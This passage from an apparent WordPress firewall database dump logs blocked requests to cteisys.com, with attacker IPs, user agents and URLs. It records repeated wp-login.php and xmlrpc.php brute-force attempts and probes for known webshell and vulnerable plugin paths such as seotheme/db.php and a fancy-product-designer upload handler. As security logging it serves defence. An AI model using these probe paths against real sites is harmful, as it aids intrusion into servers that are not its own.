Safari\\/537.36\"}','uZkaJqPLotAn73XH6zwCyp5R',0,1665780892.8812,13504,'','POST',403,0,515,0,1,'',0),('128.127.104.80',2155833424,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kDxPU2o7dsqHbnXlAemaJj9v',0,1665778626.4510,18586,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TQMbs30Sj6NXIgHVnJZAKBi1',0,1665798755.3165,279,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HCQMRzBvcDi3a8qThOUXPw2e',0,1665798754.2684,268,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','YclqV81Uht6n7KjFQ5SMHEO9',0,1665798753.2135,279,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','P691qJyaRivI7ApQ0KEgtScZ',0,1665798752.0927,273,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Nnt3E9GDPC7uUzoYWA5lhy2T',0,1665798750.9704,311,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2kbeqXQHoKOvl9cMTGdaFNit',0,1665798749.7315,308,'','GET',403,0,700,0,1,'',0),('104.244.77.229',1760841189,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','k6jm0KMyD3xEJQupbztYvV1U',0,1665784994.4537,1555,'','POST',403,0,600,0,1,'',0),('213.152.161.211',3583549907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DpQHT6tLxhBl1NrCG3AXdn0U',0,1665788326.4126,2300,'','POST',403,0,515,0,1,'',0),('213.152.187.215',3583556567,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uUxovXbBpGsiqWHykLtTfZdj',0,1665785024.0571,1624,'','POST',403,0,515,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GzYE0n7FeiBfljSU9vXr2tKJ',0,1665798747.5936,282,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','daRZPNWIBn1ebJxuwfVGyYzh',0,1665798748.6762,293,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FlISrUJuPL7tdcGipofmEgDX',0,1665798745.4067,287,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','BetQXfq6kNRIELw5WoHFAlUi',0,1665798746.4930,301,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9jwmbaGuhyzJDTUp510tNM8g',0,1665798744.2423,309,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2wBcdXDhlAP956y0LvKRTbYN',0,1665798743.1824,304,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','rlYAVsNo2bamR7G8UjpFchef',0,1665798742.0695,323,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9g7HuXTBSYcVL6QkxpbteFzR',0,1665798740.9822,268,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','i52Xo43arTpWOh7CvUDPA6ms',0,1665798739.9179,285,'','POST',403,0,700,0,1,'',0),('208.67.106.91',3494079067,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UkTjEfB7ysGCeFP5izutlLvN',0,1665794047.7975,296,'','GET',403,0,700,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/600.1.3 (KHTML, like Gecko) Version\\/8.0 Safari\\/600.1.3\"}','o5DSvlYNactjB7Wmd8zQPyxe',0,1665794021.3920,496,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/7.0.5 Safari\\/537.77.4\"}','RUFj9PmOhd48LMV3ouGatnpN',0,1665793107.3513,484,'','POST',403,0,600,0,1,'',0),('198.98.50.19',3328324115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','ZbqoOz2wpe4U9s7GlXgYraCQ',0,1665792162.2963,456,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','dVjpEGaLy0RvtliIebTJmcDP',0,1665792184.9085,5849,'','POST',403,0,600,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/css/index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','p1MhXzfArUIOVKG67yLdPw0i',0,1665798738.7881,288,'','GET',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','gdDe5fabZrR0ick8t3AsJYOp',0,1665798737.5918,294,'','POST',403,0,700,0,1,'',0),('178.172.138.41',2997652009,'','https://cteisys.com/years.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Ur6JZakFnWyXsceH0CoG3PQf',0,1665798736.4512,365,'','GET',403,0,700,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\\/5.0)\"}','LladIWD6HCeYK5wcqjpN0nTS',0,1665798399.9734,471,'','POST',403,0,600,0,1,'',0),('31.3.152.100',520329316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QFMcZJAo7Kb5ySjnsOvkRuNa',0,1665797758.3395,1192,'','POST',403,0,515,0,1,'',0),('199.249.230.12',3355043340,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uUDkHfXpl24obJrQcgVKCySF',0,1665797705.5237,16952,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xBfscpYECbuHISz8476o9XN1',0,1665797703.7724,18703,'','POST',403,0,515,0,1,'',0),('104.244.77.229',1760841189,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','hf0SQRyXiM1xsr3B9KOpGzoN',0,1665803018.7047,1526,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D257 Safari\\/9537.53\"}','BTLOS1PXChtiNEcljQ5Kuq43',0,1665803668.4543,16944,'','POST',403,0,600,0,1,'',0),('209.141.47.94',3515690846,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','LOGEM5RxySWo4vAdgkZ6YPJn',0,1665809998.4473,1284,'','POST',403,0,600,0,1,'',0),('20.19.122.234',336820970,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','2ra4YMJHpghTfC09OkAWBivm',0,1665809565.1612,282,'','GET',403,0,700,0,1,'',0),('20.19.122.234',336820970,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VxWjzlYc0smFE2bDnt61BrdA',0,1665809559.3059,3196,'','GET',403,0,700,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','N6t0KBWOwAiPxVhFJ8G9Qdsu',0,1665809257.0406,458,'','POST',403,0,600,0,1,'',0),('213.152.161.138',3583549834,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','bgT8S0z3NsBJdkOAaEqKyr6Q',0,1665808448.4457,18938,'','POST',403,0,515,0,1,'',0),('134.19.179.243',2249438195,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ujKPROw5JsVBvZDb3TxyEeio',0,1665809098.2625,18580,'','POST',403,0,515,0,1,'',0),('213.152.162.10',3583549962,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vT4HRntiuVPJeWO0pYNmqFdB',0,1665811067.0361,13876,'','POST',403,0,515,0,1,'',0),('213.152.187.230',3583556582,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JLD3CzfqEMNIvKto7POdp2ym',0,1665815078.2199,18603,'','POST',403,0,515,0,1,'',0),('139.162.36.174',2342659246,'','https://cteisys.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','zPUApH6fNRxv3OlcZ9ILXJ8i',0,1665823518.7796,275,'','GET',403,0,700,0,1,'',0),('139.162.36.174',2342659246,'','https://cteisys.com/wp-content/plugins/apikey/apikey.php.suspected?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','xkfQ4GzilqB3eW1pmIu7XEnh',0,1665823517.8339,277,'','GET',403,0,700,0,1,'',0),('139.162.36.174',2342659246,'','https://cteisys.com/plugins/content/apismtp/apismtp.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','2A3wNVHCs6ovXzBkx1apKt8e',0,1665823517.0003,273,'','GET',403,0,700,0,1,'',0),('139.162.36.174',2342659246,'','https://cteisys.com/wp-content/plugins/apikey/apikey.php?test=hello','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\"}','VU3mXcKHCx9ukgdFP47I0eiw',0,1665823516.1694,277,'','GET',403,0,700,0,1,'',0),('139.162.36.174',2342659246,'','https://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fxHrXeSJKaF3Z5DhgWEbocsk',0,1665823496.5893,268,'','POST',403,0,700,0,1,'',0),('139.162.36.174',2342659246,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HzT6o5itB9gR3ZWkeFmVXnv7',0,1665823491.9042,989,'','POST',403,0,700,0,1,'',0),('104.254.90.243',1761499891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5GL4SI7mbWNT6UoZ0D9RgF3V',0,1665822903.6357,18922,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','aZL1wWTcmPXbAjEKV0xQyuU6',0,1665822188.2216,18569,'','POST',403,0,515,0,1,'',0),('213.152.161.101',3583549797,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XNBvkJ690cMKH3EpP4ZYSGIy',0,1665822274.1141,18291,'','POST',403,0,515,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','oyA5w01XxplRZcad6k2NG4Tt',0,1665830865.8623,17260,'','POST',403,0,600,0,1,'',0),('205.185.120.53',3451484213,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','bgfUq5wA39k0dB8jz6tS1aWo',0,1665835081.8641,1580,'','POST',403,0,600,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','','{\"1\":\"ALittle Client\"}','H0aJfiuWNhIpwM7OUmcZQqY4',0,1665833212.1138,11472,'','GET',403,0,700,0,1,'',0),('213.152.161.211',3583549907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','STIlPR3K6jbA2UW5Q1Moyfvc',0,1665832499.7945,18958,'','POST',403,0,515,0,1,'',0),('185.189.112.19',3116199955,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TImNsZfd7yn6bi0RQJCH2reM',0,1665837960.9433,19269,'','POST',403,0,515,0,1,'',0),('184.75.221.59',3091979579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ijtRZTWhwE5zUFJQuXv9HOKd',0,1665839932.7951,2307,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','U10vdpaBKTiIgcyeYQbnzDPo',0,1665840924.3613,18303,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OXAz18v0hmUtw4l9LsNFQZSb',0,1665882545.2891,17811,'','POST',403,0,515,0,1,'',0),('103.154.177.165',1738191269,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g9Qwk43yZFMvj72zu6AI5SGB',0,1665882545.2839,17833,'','POST',403,0,515,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2rdhQEPcwLtoRVyIxY1kJTi0',0,1665881607.4994,18166,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','BYg75htrTUSmdl3ipNGcQkED',0,1665881399.4148,481,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yoK93ksPwa0HnWOCqi8bAvIt',0,1665881391.9295,288,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2tk7URnagIerKY6Cl5F9Bywu',0,1665881389.7373,285,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','x3WjSmco26lsvqbZzrBYdGwL',0,1665881382.3099,311,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','h2nqlgVaJAotX5K0RfNpEzdF',0,1665881379.9443,330,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','86Ia1dtQgsKyfvT9OVX5LAWo',0,1665881374.8192,277,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lw8bfJperXd4SMDUQt6IxC3H',0,1665881378.3735,287,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','UC3IFSZLz8i9R0Al2vjnskX5',0,1665881373.3484,288,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vROoZNirbQn1YxBahA4PSIsu',0,1665881372.2557,288,'','GET',403,0,700,0,1,'',0),('209.141.45.47',3515690287,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','dRyJ0XFKvkHiE9hlNbsSnwcA',0,1665849453.4938,495,'','POST',403,0,600,0,1,'',0),('178.162.209.171',2997014955,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','HJV06rSNFTwvU72hfozCEZ4L',0,1665849412.2359,1396,'','POST',403,0,515,0,1,'',0),('185.189.112.11',3116199947,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','86V34sHjubfdYAT1kDSWFPUc',0,1665849268.2066,1307,'','POST',403,0,515,0,1,'',0),('95.217.147.17',1608094481,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ASZ2Gq4mcY7KEOdbUnRw5PHW',0,1665848949.5761,15522,'','POST',403,0,515,0,1,'',0),('177.52.160.32',2973016096,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jbBpuOCG37Y50ydc2gW84UEh',0,1665848945.5813,19516,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','WDT1L7kFQUqjeszo95ulAyEI',0,1665847010.8374,1257,'','POST',403,0,600,0,1,'',0),('18.224.85.64',316691776,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9xfkdF3aGrZnRhuKCs7mXAEt',0,1665867526.2081,1194,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1PsOQHDn34TiwXEIbKyoBmqZ',0,1665867253.5163,17664,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5eQ9bVBqakj2OCAWE4lgFi6S',0,1665867257.0501,14076,'','POST',403,0,515,0,1,'',0),('92.205.25.182',1556945334,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8lzmbUuT9dZC2xqpGisYOjtv',0,1665852924.4451,10238,'','POST',403,0,515,0,1,'',0),('104.243.26.114',1760762482,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zo3ev7xyw6i90TaURADk5num',0,1665852916.9256,17783,'','POST',403,0,515,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 